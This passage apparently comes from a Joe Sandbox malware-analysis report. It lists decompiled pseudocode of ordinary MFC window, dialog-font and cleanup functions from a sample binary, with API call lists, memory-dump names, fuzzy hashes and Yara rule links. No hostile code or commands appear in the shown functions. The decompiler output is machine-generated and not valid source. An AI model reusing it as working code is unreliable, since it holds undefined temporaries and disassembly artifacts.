                                                                                                                            • lstrlenA.KERNEL32(00000000,000000FF,00000050,0040ED18,00000000,00000001,?,?,000000FF,?,?,?), ref: 0041AD66
                                                                                                                              • Part of subcall function 00403659: _memcpy_s.LIBCMT ref: 00403669
                                                                                                                            • _memset.LIBCMT ref: 0041AE36
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0041AF15
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4021759052-0
                                                                                                                            • Opcode ID: 3ffc94660408ca84cd24c45c1457735a3a52db081bdf9c2082ce3027ee7f2e56
                                                                                                                            • Instruction ID: 2544666188b67eec231cd98c13667d8998fb157800edacac9dd4db2f7974a81a
                                                                                                                            • Opcode Fuzzy Hash: 3ffc94660408ca84cd24c45c1457735a3a52db081bdf9c2082ce3027ee7f2e56
                                                                                                                            • Instruction Fuzzy Hash: 3AA1AE70C01209DBCF11DFA5C9856EEBBB1FF08354F24415AE411B7291C7399E92DB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004065F5 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 81%
                                                                                                                            			E004065F5(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t71;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x441590; // 0x4917eadc
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E00406516(0);
				_t63 = E0040654A(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E0040647F(_t64, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E00406516(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E0041D773(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}






















                                                                                                                            0x004065f5
                                                                                                                            0x004065f6
                                                                                                                            0x00406603
                                                                                                                            0x0040660a
                                                                                                                            0x00406619
                                                                                                                            0x0040661f
                                                                                                                            0x00406622
                                                                                                                            0x00406625
                                                                                                                            0x00406635
                                                                                                                            0x0040663a
                                                                                                                            0x0040663d
                                                                                                                            0x00406642
                                                                                                                            0x00406642
                                                                                                                            0x00406648
                                                                                                                            0x00406650
                                                                                                                            0x00406658
                                                                                                                            0x0040667d
                                                                                                                            0x0040667d
                                                                                                                            0x0040667f
                                                                                                                            0x00406681
                                                                                                                            0x00406681
                                                                                                                            0x00000000
                                                                                                                            0x00406665
                                                                                                                            0x0040666f
                                                                                                                            0x00406677
                                                                                                                            0x00000000
                                                                                                                            0x00406679
                                                                                                                            0x00406679
                                                                                                                            0x00406684
                                                                                                                            0x00406684
                                                                                                                            0x0040668a
                                                                                                                            0x0040668e
                                                                                                                            0x00406691
                                                                                                                            0x00406699
                                                                                                                            0x004066a0
                                                                                                                            0x004066a0
                                                                                                                            0x00406699
                                                                                                                            0x004066a9
                                                                                                                            0x004066b1
                                                                                                                            0x004066b7
                                                                                                                            0x004066ca
                                                                                                                            0x004066ca
                                                                                                                            0x004066ca
                                                                                                                            0x004066b9
                                                                                                                            0x004066bf
                                                                                                                            0x004066c1
                                                                                                                            0x004066c1
                                                                                                                            0x004066bf
                                                                                                                            0x004066b7
                                                                                                                            0x004066d1
                                                                                                                            0x004066d3
                                                                                                                            0x004066d7
                                                                                                                            0x004066de
                                                                                                                            0x004066e1
                                                                                                                            0x004066f2
                                                                                                                            0x004066f4
                                                                                                                            0x004066f6
                                                                                                                            0x004066f6
                                                                                                                            0x004066d9
                                                                                                                            0x004066d9
                                                                                                                            0x004066d9
                                                                                                                            0x004066fd
                                                                                                                            0x00406703
                                                                                                                            0x00406704
                                                                                                                            0x00406707
                                                                                                                            0x00406714
                                                                                                                            0x00406716
                                                                                                                            0x0040671b
                                                                                                                            0x0040671b
                                                                                                                            0x00406721
                                                                                                                            0x00406728
                                                                                                                            0x00406728
                                                                                                                            0x00406730
                                                                                                                            0x0040673e
                                                                                                                            0x0040673f
                                                                                                                            0x00406742
                                                                                                                            0x0040674f
                                                                                                                            0x0040674f
                                                                                                                            0x00406677

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040654A: GetParent.USER32(?), ref: 0040659D
                                                                                                                              • Part of subcall function 0040654A: GetLastActivePopup.USER32(?), ref: 004065AC
                                                                                                                              • Part of subcall function 0040654A: IsWindowEnabled.USER32(?), ref: 004065C1
                                                                                                                              • Part of subcall function 0040654A: EnableWindow.USER32(?,00000000), ref: 004065D4
                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00406642
                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00406650
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0040665A
                                                                                                                            • SendMessageA.USER32 ref: 0040666F
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004066EC
                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00406728
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1877664794-0
                                                                                                                            • Opcode ID: 4e70acd59f011cbef078f760bb237f535ca916e1e0a1b8878302e9251c632126
                                                                                                                            • Instruction ID: e81fa182269bb56abd498ca8c77d42eddbd1c58dca8b6b56fb031d885075140c
                                                                                                                            • Opcode Fuzzy Hash: 4e70acd59f011cbef078f760bb237f535ca916e1e0a1b8878302e9251c632126
                                                                                                                            • Instruction Fuzzy Hash: A241D431A003189FDB318F75CC85BDEB7B8AF05305F25053AE95AAB2D1D77989648F18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040654A Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040654A(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E00406473();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E00402551();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                                                                            0x00406552
                                                                                                                            0x0040655a
                                                                                                                            0x0040655c
                                                                                                                            0x00406579
                                                                                                                            0x00406587
                                                                                                                            0x00406592
                                                                                                                            0x00406594
                                                                                                                            0x00406596
                                                                                                                            0x00406598
                                                                                                                            0x004065a3
                                                                                                                            0x004065a5
                                                                                                                            0x004065b2
                                                                                                                            0x004065b2
                                                                                                                            0x004065b4
                                                                                                                            0x004065ba
                                                                                                                            0x004065be
                                                                                                                            0x004065dc
                                                                                                                            0x004065cf
                                                                                                                            0x004065d2
                                                                                                                            0x004065d4
                                                                                                                            0x004065d4
                                                                                                                            0x004065be
                                                                                                                            0x004065e5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040659a
                                                                                                                            0x0040659a
                                                                                                                            0x0040659b
                                                                                                                            0x0040659d
                                                                                                                            0x0040659f
                                                                                                                            0x00000000
                                                                                                                            0x0040659a
                                                                                                                            0x0040658c
                                                                                                                            0x0040658e
                                                                                                                            0x00406590
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406590
                                                                                                                            0x0040655e
                                                                                                                            0x00406565
                                                                                                                            0x00406574
                                                                                                                            0x00406574
                                                                                                                            0x00000000
                                                                                                                            0x00406574
                                                                                                                            0x00406567
                                                                                                                            0x0040656e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406570
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 670545878-0
                                                                                                                            • Opcode ID: 732253c6be58680e231817f4db232ed5d9988b4cfe17c1fb3e97002a2bdbf151
                                                                                                                            • Instruction ID: 4ccdb2989d75957f86fe7f35c2c0faaf685863b6740218c26c2fbe2731c72ac2
                                                                                                                            • Opcode Fuzzy Hash: 732253c6be58680e231817f4db232ed5d9988b4cfe17c1fb3e97002a2bdbf151
                                                                                                                            • Instruction Fuzzy Hash: DC1160716012316BC6321F697C44B2BB6AC5F64B65F17013AAC06F33D9DA78CD2086AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E0FF Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E0040E0FF(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}






                                                                                                                            0x0040e10e
                                                                                                                            0x0040e15f
                                                                                                                            0x0040e15f
                                                                                                                            0x0040e161
                                                                                                                            0x0040e165
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e12b
                                                                                                                            0x0040e142
                                                                                                                            0x0040e148
                                                                                                                            0x0040e15a
                                                                                                                            0x00000000
                                                                                                                            0x0040e16d
                                                                                                                            0x0040e15a
                                                                                                                            0x0040e15f
                                                                                                                            0x0040e15f
                                                                                                                            0x0040e16a

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1315500227-0
                                                                                                                            • Opcode ID: be73aacfaf724379482ccd15f7e5174073728bccc8d37bce8996a427e683b000
                                                                                                                            • Instruction ID: be4c7efb3693837c78beb6b756b4bfb8c57c99fed0ba2685a7544fcc56a0507a
                                                                                                                            • Opcode Fuzzy Hash: be73aacfaf724379482ccd15f7e5174073728bccc8d37bce8996a427e683b000
                                                                                                                            • Instruction Fuzzy Hash: CA016736200115BBCB12AF559C08EAF7B6CEF05752F005435F911AA290D734DA228798
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417DAE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E00417DAE(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x441590; // 0x4917eadc
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E00417C10(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E00417C3B(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E00420C66(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E0040EF79(_t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E0040EF79(_t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E0041D773(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}



























                                                                                                                            0x00417dae
                                                                                                                            0x00417dae
                                                                                                                            0x00417dae
                                                                                                                            0x00417db4
                                                                                                                            0x00417dbb
                                                                                                                            0x00417dc2
                                                                                                                            0x00417dc8
                                                                                                                            0x00417dcb
                                                                                                                            0x00417dd4
                                                                                                                            0x00417dd5
                                                                                                                            0x00417dde
                                                                                                                            0x00417dec
                                                                                                                            0x00417def
                                                                                                                            0x00417df7
                                                                                                                            0x00417e0d
                                                                                                                            0x00417e0f
                                                                                                                            0x00417e12
                                                                                                                            0x00417e1a
                                                                                                                            0x00417e14
                                                                                                                            0x00417e14
                                                                                                                            0x00417e14
                                                                                                                            0x00417e29
                                                                                                                            0x00417ea7
                                                                                                                            0x00417ea7
                                                                                                                            0x00417e2b
                                                                                                                            0x00417e40
                                                                                                                            0x00417e45
                                                                                                                            0x00417e48
                                                                                                                            0x00000000
                                                                                                                            0x00417e4a
                                                                                                                            0x00417e4b
                                                                                                                            0x00417e51
                                                                                                                            0x00417e56
                                                                                                                            0x00417e58
                                                                                                                            0x00417e5e
                                                                                                                            0x00417e63
                                                                                                                            0x00417e67
                                                                                                                            0x00417e67
                                                                                                                            0x00417e6b
                                                                                                                            0x00417e6f
                                                                                                                            0x00417e72
                                                                                                                            0x00417e76
                                                                                                                            0x00417e79
                                                                                                                            0x00417e80
                                                                                                                            0x00417e83
                                                                                                                            0x00417e8b
                                                                                                                            0x00417e85
                                                                                                                            0x00417e85
                                                                                                                            0x00417e85
                                                                                                                            0x00417e92
                                                                                                                            0x00417eb7
                                                                                                                            0x00417ebe
                                                                                                                            0x00417ec7
                                                                                                                            0x00417ecf
                                                                                                                            0x00417edc
                                                                                                                            0x00417edf
                                                                                                                            0x00417ee5
                                                                                                                            0x00417eeb
                                                                                                                            0x00417e99
                                                                                                                            0x00417e99
                                                                                                                            0x00417ea0
                                                                                                                            0x00417ea5
                                                                                                                            0x00417eaf
                                                                                                                            0x00417eb4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00417ea5
                                                                                                                            0x00417e92
                                                                                                                            0x00417e48
                                                                                                                            0x00417eec
                                                                                                                            0x00417eed
                                                                                                                            0x00417dcd
                                                                                                                            0x00417dcd
                                                                                                                            0x00417dcd
                                                                                                                            0x00417efa

                                                                                                                            APIs
                                                                                                                            • GlobalLock.KERNEL32 ref: 00417DD8
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00417E20
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00417E3A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                            • String ID: System
                                                                                                                            • API String ID: 1529587224-3470857405
                                                                                                                            • Opcode ID: 866fd7e03e5578e458ecf540174e6b04059ec9c4540ba53e2ec46da8a2dcda12
                                                                                                                            • Instruction ID: cf6115e209172b931adedf536937ce6833d6f34ad007e93cebf6e0def82b715d
                                                                                                                            • Opcode Fuzzy Hash: 866fd7e03e5578e458ecf540174e6b04059ec9c4540ba53e2ec46da8a2dcda12
                                                                                                                            • Instruction Fuzzy Hash: 3D410671904215DFCB14DFA4C885AEEBBF5FF04314F14856AE412EB285E7789D81CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040FEDA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E0040FEDA(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t75;
				void* _t78;

				_t77 = __esi;
				_t76 = __edi;
				_t75 = __edx;
				_push(0x20);
				E0041E9EA(E0043181C, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t78 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x434f4c;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t78 - 4) = 2;
				 *((intOrPtr*)(_t78 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E00419013(_t59, _t59 + 0x24, _t75, _t76);
						E0041982B(_t59 + 0x64);
						 *(_t78 - 0x20) =  *(_t78 - 0x20) & 0x00000000;
						_push(_t78 - 0x20);
						if(E004199DB(_t59, 0x437bcc) >= 0) {
							_t77 = "mfcm80.dll";
							_t76 = _t78 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t78 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t78 - 0x20));
								}
							}
							_t45 =  *(_t78 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t78 - 4) = 1;
						E004193B3(_t59 + 0x40);
						 *(_t78 - 4) = 0;
						E004191E8(_t59, _t59 + 0x24, _t75, _t76);
						 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
						E004054FB(_t59);
						return E0041EA6D(_t59, _t76, _t77);
					}
					_t76 = _t59 + 0x40;
					do {
						_t77 = E004192FA(_t76);
						_t86 = _t77;
						if(_t77 != 0) {
							E0040F69D(_t77);
							_push(_t77);
							E0040254C(_t59, _t75, _t76, _t77, _t86);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t76 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t78 - 0x28)) = _t33;
						_t77 =  *((intOrPtr*)(E00403A5E(_t78 - 0x24)));
						if(_t77 != 0) {
							_t54 =  *((intOrPtr*)(_t77 + 4));
							if(_t54 != 0) {
								_t83 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E0041932B(_t76,  *((intOrPtr*)(_t78 - 0x28)));
									E0040F69D(_t77);
									_push(_t77);
									E0040254C(_t59, _t75, _t76, _t77, _t83);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t78 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}











                                                                                                                            0x0040feda
                                                                                                                            0x0040feda
                                                                                                                            0x0040feda
                                                                                                                            0x0040feda
                                                                                                                            0x0040fee1
                                                                                                                            0x0040fee6
                                                                                                                            0x0040fee8
                                                                                                                            0x0040feeb
                                                                                                                            0x0040fef1
                                                                                                                            0x0040fef6
                                                                                                                            0x0040fefd
                                                                                                                            0x0040ff00
                                                                                                                            0x0040ff48
                                                                                                                            0x0040ff4c
                                                                                                                            0x0040ff72
                                                                                                                            0x0040ff75
                                                                                                                            0x0040ff7e
                                                                                                                            0x0040ff83
                                                                                                                            0x0040ff8a
                                                                                                                            0x0040ff99
                                                                                                                            0x0040ff9b
                                                                                                                            0x0040ffa0
                                                                                                                            0x0040ffa3
                                                                                                                            0x0040ffa4
                                                                                                                            0x0040ffa5
                                                                                                                            0x0040ffab
                                                                                                                            0x0040ffac
                                                                                                                            0x0040ffb4
                                                                                                                            0x0040ffbc
                                                                                                                            0x0040ffc4
                                                                                                                            0x0040ffc9
                                                                                                                            0x0040ffcb
                                                                                                                            0x0040ffc4
                                                                                                                            0x0040ffcc
                                                                                                                            0x0040ffd2
                                                                                                                            0x0040ffd2
                                                                                                                            0x0040ffd8
                                                                                                                            0x0040ffdc
                                                                                                                            0x0040ffe4
                                                                                                                            0x0040ffe8
                                                                                                                            0x0040ffed
                                                                                                                            0x0040fff3
                                                                                                                            0x0040fffd
                                                                                                                            0x0040fffd
                                                                                                                            0x0040ff4e
                                                                                                                            0x0040ff51
                                                                                                                            0x0040ff58
                                                                                                                            0x0040ff5a
                                                                                                                            0x0040ff5c
